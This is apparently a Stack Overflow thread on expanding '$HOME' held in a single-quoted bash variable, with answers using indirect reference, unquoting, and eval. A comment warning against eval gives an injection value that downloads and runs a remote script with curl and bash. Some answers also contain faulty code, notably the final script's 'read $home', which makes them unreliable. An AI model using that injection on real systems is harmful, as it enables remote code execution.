# use bash $HOME in shell script

Tags: bash, shell

How to made bash to execute variable value.
For example, we have this code, where variable value was set in single quotes(!).

```
#!/bin/bash
V_MY_PATH='$HOME'
echo "$V_MY_PATH"
ls $V_MY_PATH
```

The output is

```
$HOME
ls: $HOME: No such file or directory
```

How to made bash to translate shell variable insto its value if there is some.

I want to add some code after V_MY_PATH='$HOME' to make output like echo $HOME.

It's something simple, but i'm stuck.
(NB: I know that with V_MY_PATH="$HOME", it works fine.)

EDIT PART:
I just wanted to make it simple, but I feel that some details are needed.

I'm getting parameter from a file. This part works good. I don't want to rewite it.
The problem is that when my V_MY_PATH contains a predefined variable (like $home) it's not treated like its value.

Comment: Why are you doing this? There is absolutely no reason to store `HOME` in a variable like this. You're probably asking the wrong question. State what you're actually trying to accomplish so that a proper answer can be given.

Answer (score 8, accepted):

use variable indirect reference so:

```
pete.mccabe@jackfrog$ p='HOME'
pete.mccabe@jackfrog$ echo $p
HOME
pete.mccabe@jackfrog$ ls ${p}
ls: cannot access HOME: No such file or directory
pete.mccabe@jackfrog$ ls ${!p}
bash                        libpng-1.2.44-1.el6      python-hwdata           squid
...
pete.mccabe@jackfrog$
```

The ${!p} means take the value of $p and that value is the name of the variable who's contents I wish to reference

Comment: I need to test it myself, but that sounds like what I need!

Comment: I think that this is a good answer for the question, that is  formulated above. Probably the question is bad formulated. I'm sorry for that.

Comment: For the indirect reference syntax to work you'd need `p` (or `V_MY_PATH` in the question) to contain just the name of the variable, `p='HOME'`, not also the `$` symbol for evaluating it.

Comment: In your answer are you in your home directory? `${!p}` will evaluate to nothing, so the output will be the same as just calling `ls` without any arguments.

Answer (score 11):

Remove the single quotes

```
V_MY_PATH='$HOME'
```

should be

```
V_MY_PATH=$HOME
```

you want to use `$HOME` as a variable

you can't have variables in single quotes.

Complete script:

```
#!/bin/bash
V_MY_PATH=$HOME
echo "$V_MY_PATH" 
ls "$V_MY_PATH"  #; Add double quotes here in case you get weird filenames
```

Output:

```
/home/myuser
0
05430142.pdf
4
aiSearchFramework-7_10_2007-v0.1.rar
```

etc.

Comment: `x=$y` is sufficient. There is no globbing or word-splitting in assignments.

Comment: It's not a mistake or anything, just a minor detail. :) The bigger issue is the lack of quoting for the argument to `ls`. edit: yes sure. You could test with `x=*` assuming the directory isn't empty.

Comment: @ormaaj Fixed that to. have I passed SO quality standards? :P

Comment: Looks good, +1 for lack of errors :). (I'm pretty sure the questioner is confused about what they really want anyway. I don't even know how to answer the question. My completely wild guess would be they're looking for how to provide a default value.)

Comment: Thank you for the answer as I wrote a know that with double quotes it works good.

Answer (score 1):

Use **[eval](http://tldp.org/LDP/abs/html/internal.html#EX43)** command:

```
#!/bin/bash

V_MY_PATH='$HOME'
echo "$V_MY_PATH"
eval ls $V_MY_PATH
```

Comment: eval is a bad way to do this. V_MY_PATH='curl <url_for_script> -o x.sh;bash x.sh' and so any code I want can be executed with you're permissions.

Comment: I don't see how your curl example is relevant. OP uses `ls` command to and want to list the contents of home directory.

Comment: sorry missed the prepending ';' which would end the ls command and start the curl download and execute a script

Answer (score 0):

1. You can use single or double quotes, and in your case, none if you prefer.
2. You have nothing telling bash what the variable is equal to. Maybe something like this? (unless I misunderstand what you are trying to do)

======================================================================

```
#!/bin/bash

#########################
#       VARIABLES       #
#########################
V_MY_PATH=home

#########################
#        SCRIPT         #
#########################

echo "What is your home path?"
read $home
echo "Your home path is $V_MY_PATH"
ls $V_MY_PATH
```

Of course you could also just remove the variable at the top and use:
    echo "Your home path is $home"